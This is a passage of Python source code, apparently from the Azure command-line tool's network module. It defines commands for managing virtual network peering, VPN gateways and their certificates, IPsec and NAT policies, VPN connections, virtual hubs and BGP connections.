if not is_valid_resource_id(remote_virtual_network):
remote_virtual_network = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=remote_virtual_network
)
SubResource, VirtualNetworkPeering = cmd.get_models('SubResource', 'VirtualNetworkPeering')
peering = VirtualNetworkPeering(
id=resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=virtual_network_name),
name=virtual_network_peering_name,
remote_virtual_network=SubResource(id=remote_virtual_network),
allow_virtual_network_access=allow_virtual_network_access,
allow_gateway_transit=allow_gateway_transit,
allow_forwarded_traffic=allow_forwarded_traffic,
use_remote_gateways=use_remote_gateways)
aux_subscription = parse_resource_id(remote_virtual_network)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def update_vnet_peering(cmd, resource_group_name, virtual_network_name, virtual_network_peering_name, **kwargs):
peering = kwargs['parameters']
aux_subscription = parse_resource_id(peering.remote_virtual_network.id)['subscription']
ncf = network_client_factory(cmd.cli_ctx, aux_subscriptions=[aux_subscription])
return ncf.virtual_network_peerings.begin_create_or_update(
resource_group_name, virtual_network_name, virtual_network_peering_name, peering)
def list_available_ips(cmd, resource_group_name, virtual_network_name):
client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet = client.get(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name)
start_ip = vnet.address_space.address_prefixes[0].split('/')[0]
available_ips = client.check_ip_address_availability(resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
ip_address=start_ip)
return available_ips.available_ip_addresses
# endregion
# region VirtualNetworkGateways
def create_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, public_cert_data, cert_name):
VpnClientRootCertificate = cmd.get_models('VpnClientRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
raise CLIError("Must add address prefixes to gateway '{}' prior to adding a root cert."
.format(gateway_name))
config = gateway.vpn_client_configuration
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
cert = VpnClientRootCertificate(name=cert_name, public_cert_data=public_cert_data)
upsert_to_collection(config, 'vpn_client_root_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_root_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_root_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_root_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def create_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, thumbprint, cert_name):
VpnClientRevokedCertificate = cmd.get_models('VpnClientRevokedCertificate')
config, gateway, ncf = _prep_cert_create(cmd, gateway_name, resource_group_name)
cert = VpnClientRevokedCertificate(name=cert_name, thumbprint=thumbprint)
upsert_to_collection(config, 'vpn_client_revoked_certificates', cert, 'name')
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def delete_vnet_gateway_revoked_cert(cmd, resource_group_name, gateway_name, cert_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
config = gateway.vpn_client_configuration
try:
cert = next(c for c in config.vpn_client_revoked_certificates if c.name == cert_name)
except (AttributeError, StopIteration):
raise CLIError('Certificate "{}" not found in gateway "{}"'.format(cert_name, gateway_name))
config.vpn_client_revoked_certificates.remove(cert)
return ncf.begin_create_or_update(resource_group_name, gateway_name, gateway)
def _prep_cert_create(cmd, gateway_name, resource_group_name):
VpnClientConfiguration = cmd.get_models('VpnClientConfiguration')
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if not gateway.vpn_client_configuration:
gateway.vpn_client_configuration = VpnClientConfiguration()
config = gateway.vpn_client_configuration
if not config.vpn_client_address_pool or not config.vpn_client_address_pool.address_prefixes:
raise CLIError('Address prefixes must be set on VPN gateways before adding'
' certificates. Please use "update" with --address-prefixes first.')
if config.vpn_client_revoked_certificates is None:
config.vpn_client_revoked_certificates = []
if config.vpn_client_root_certificates is None:
config.vpn_client_root_certificates = []
return config, gateway, ncf
def create_vnet_gateway(cmd, resource_group_name, virtual_network_gateway_name, public_ip_address,
virtual_network, location=None, tags=None,
no_wait=False, gateway_type=None, sku=None, vpn_type=None, vpn_gateway_generation=None,
asn=None, bgp_peering_address=None, peer_weight=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None, edge_zone=None,
nat_rule=None):
(VirtualNetworkGateway, BgpSettings, SubResource, VirtualNetworkGatewayIPConfiguration, VirtualNetworkGatewaySku,
VpnClientConfiguration, AddressSpace, VpnClientRootCertificate, VirtualNetworkGatewayNatRule,
VpnNatRuleMapping) = cmd.get_models(
'VirtualNetworkGateway', 'BgpSettings', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VirtualNetworkGatewaySku', 'VpnClientConfiguration', 'AddressSpace', 'VpnClientRootCertificate',
'VirtualNetworkGatewayNatRule', 'VpnNatRuleMapping')
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
subnet = virtual_network + '/subnets/GatewaySubnet'
active = len(public_ip_address) == 2
vnet_gateway = VirtualNetworkGateway(
gateway_type=gateway_type, vpn_type=vpn_type, vpn_gateway_generation=vpn_gateway_generation, location=location,
tags=tags, sku=VirtualNetworkGatewaySku(name=sku, tier=sku), active=active, ip_configurations=[],
gateway_default_site=SubResource(id=gateway_default_site) if gateway_default_site else None)
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic',
name='vnetGatewayConfig{}'.format(i)
)
vnet_gateway.ip_configurations.append(ip_configuration)
if asn or bgp_peering_address or peer_weight:
vnet_gateway.enable_bgp = True
vnet_gateway.bgp_settings = BgpSettings(asn=asn, bgp_peering_address=bgp_peering_address,
peer_weight=peer_weight)
if any((address_prefixes, client_protocol)):
vnet_gateway.vpn_client_configuration = VpnClientConfiguration()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
vnet_gateway.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
vnet_gateway.vpn_client_configuration.vpn_client_protocols = client_protocol
if any((radius_secret, radius_server)) and cmd.supported_api_version(min_api='2017-06-01'):
vnet_gateway.vpn_client_configuration.radius_server_address = radius_server
vnet_gateway.vpn_client_configuration.radius_server_secret = radius_secret
# multi authentication
if cmd.supported_api_version(min_api='2020-11-01'):
vnet_gateway.vpn_client_configuration.vpn_authentication_types = vpn_auth_type
vnet_gateway.vpn_client_configuration.aad_tenant = aad_tenant
vnet_gateway.vpn_client_configuration.aad_issuer = aad_issuer
vnet_gateway.vpn_client_configuration.aad_audience = aad_audience
vnet_gateway.vpn_client_configuration.vpn_client_root_certificates = [
VpnClientRootCertificate(name=root_cert_name,
public_cert_data=root_cert_data)] if root_cert_data else None
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
vnet_gateway.custom_routes = AddressSpace()
vnet_gateway.custom_routes.address_prefixes = custom_routes
if edge_zone:
vnet_gateway.extended_location = _edge_zone_model(cmd, edge_zone)
if nat_rule:
vnet_gateway.nat_rules = [
VirtualNetworkGatewayNatRule(type_properties_type=rule.get('type'), mode=rule.get('mode'), name=rule.get('name'),
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('internal_mappings')] if rule.get('internal_mappings') else None,
external_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in rule.get('external_mappings')] if rule.get('external_mappings') else None,
ip_configuration_id=rule.get('ip_config_id')) for rule in nat_rule]
return sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, virtual_network_gateway_name, vnet_gateway)
def update_vnet_gateway(cmd, instance, sku=None, vpn_type=None, tags=None,
public_ip_address=None, gateway_type=None, enable_bgp=None,
asn=None, bgp_peering_address=None, peer_weight=None, virtual_network=None,
address_prefixes=None, radius_server=None, radius_secret=None, client_protocol=None,
gateway_default_site=None, custom_routes=None, aad_tenant=None, aad_audience=None,
aad_issuer=None, root_cert_data=None, root_cert_name=None, vpn_auth_type=None):
(AddressSpace, SubResource, VirtualNetworkGatewayIPConfiguration, VpnClientConfiguration,
VpnClientRootCertificate) = cmd.get_models('AddressSpace', 'SubResource', 'VirtualNetworkGatewayIPConfiguration',
'VpnClientConfiguration', 'VpnClientRootCertificate')
if any((address_prefixes, radius_server, radius_secret, client_protocol)) and not instance.vpn_client_configuration:
instance.vpn_client_configuration = VpnClientConfiguration()
if address_prefixes is not None:
if not instance.vpn_client_configuration.vpn_client_address_pool:
instance.vpn_client_configuration.vpn_client_address_pool = AddressSpace()
if not instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes:
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = []
instance.vpn_client_configuration.vpn_client_address_pool.address_prefixes = address_prefixes
with cmd.update_context(instance.vpn_client_configuration) as c:
c.set_param('vpn_client_protocols', client_protocol)
c.set_param('radius_server_address', radius_server)
c.set_param('radius_server_secret', radius_secret)
if cmd.supported_api_version(min_api='2020-11-01'):
c.set_param('aad_tenant', aad_tenant)
c.set_param('aad_audience', aad_audience)
c.set_param('aad_issuer', aad_issuer)
c.set_param('vpn_authentication_types', vpn_auth_type)
if root_cert_data and cmd.supported_api_version(min_api='2020-11-01'):
upsert_to_collection(instance.vpn_client_configuration, 'vpn_client_root_certificates',
VpnClientRootCertificate(name=root_cert_name, public_cert_data=root_cert_data), 'name')
with cmd.update_context(instance.sku) as c:
c.set_param('name', sku)
c.set_param('tier', sku)
with cmd.update_context(instance) as c:
c.set_param('gateway_default_site', SubResource(id=gateway_default_site) if gateway_default_site else None)
c.set_param('vpn_type', vpn_type)
c.set_param('tags', tags)
subnet_id = '{}/subnets/GatewaySubnet'.format(virtual_network) if virtual_network else \
instance.ip_configurations[0].subnet.id
if virtual_network is not None:
for config in instance.ip_configurations:
config.subnet.id = subnet_id
if public_ip_address is not None:
instance.ip_configurations = []
for i, public_ip in enumerate(public_ip_address):
ip_configuration = VirtualNetworkGatewayIPConfiguration(
subnet=SubResource(id=subnet_id),
public_ip_address=SubResource(id=public_ip),
private_ip_allocation_method='Dynamic', name='vnetGatewayConfig{}'.format(i))
instance.ip_configurations.append(ip_configuration)
# Update active-active/active-standby status
active = len(public_ip_address) == 2
if instance.active and not active:
logger.info('Placing gateway in active-standby mode.')
elif not instance.active and active:
logger.info('Placing gateway in active-active mode.')
instance.active = active
if gateway_type is not None:
instance.gateway_type = gateway_type
if enable_bgp is not None:
instance.enable_bgp = enable_bgp.lower() == 'true'
if custom_routes and cmd.supported_api_version(min_api='2019-02-01'):
if not instance.custom_routes:
instance.custom_routes = AddressSpace()
instance.custom_routes.address_prefixes = custom_routes
_validate_bgp_peering(cmd, instance, asn, bgp_peering_address, peer_weight)
return instance
def start_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def stop_vnet_gateway_package_capture(cmd, client, resource_group_name, virtual_network_gateway_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_name, parameters=parameters)
def generate_vpn_client(cmd, client, resource_group_name, virtual_network_gateway_name, processor_architecture=None,
authentication_method=None, radius_server_auth_certificate=None, client_root_certificates=None,
use_legacy=False):
params = cmd.get_models('VpnClientParameters')(
processor_architecture=processor_architecture
)
if cmd.supported_api_version(min_api='2017-06-01') and not use_legacy:
params.authentication_method = authentication_method
params.radius_server_auth_certificate = radius_server_auth_certificate
params.client_root_certificates = client_root_certificates
return client.begin_generate_vpn_profile(resource_group_name, virtual_network_gateway_name, params)
# legacy implementation
return client.begin_generatevpnclientpackage(resource_group_name, virtual_network_gateway_name, params)
def set_vpn_client_ipsec_policy(cmd, client, resource_group_name, virtual_network_gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
VpnClientIPsecParameters = cmd.get_models('VpnClientIPsecParameters')
vpnclient_ipsec_params = VpnClientIPsecParameters(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
return sdk_no_wait(no_wait, client.begin_set_vpnclient_ipsec_parameters, resource_group_name,
virtual_network_gateway_name, vpnclient_ipsec_params)
def disconnect_vnet_gateway_vpn_connections(cmd, client, resource_group_name, virtual_network_gateway_name,
vpn_connection_ids, no_wait=False):
P2SVpnConnectionRequest = cmd.get_models('P2SVpnConnectionRequest')
request = P2SVpnConnectionRequest(vpn_connection_ids=vpn_connection_ids)
return sdk_no_wait(no_wait, client.begin_disconnect_virtual_network_gateway_vpn_connections,
resource_group_name, virtual_network_gateway_name, request)
# endregion
# region VirtualNetworkGatewayConnections
# pylint: disable=too-many-locals
def create_vpn_connection(cmd, resource_group_name, connection_name, vnet_gateway1,
location=None, tags=None, no_wait=False, validate=False,
vnet_gateway2=None, express_route_circuit2=None, local_gateway2=None,
authorization_key=None, enable_bgp=False, routing_weight=10,
connection_type=None, shared_key=None,
use_policy_based_traffic_selectors=False,
express_route_gateway_bypass=None, ingress_nat_rule=None, egress_nat_rule=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import build_vpn_connection_resource
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
raise UnrecognizedArgumentError(f'Do not find nat_rules named {name}!!!')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
try:
client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualHub "{}" under resource group "{}" exists'.format(
virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
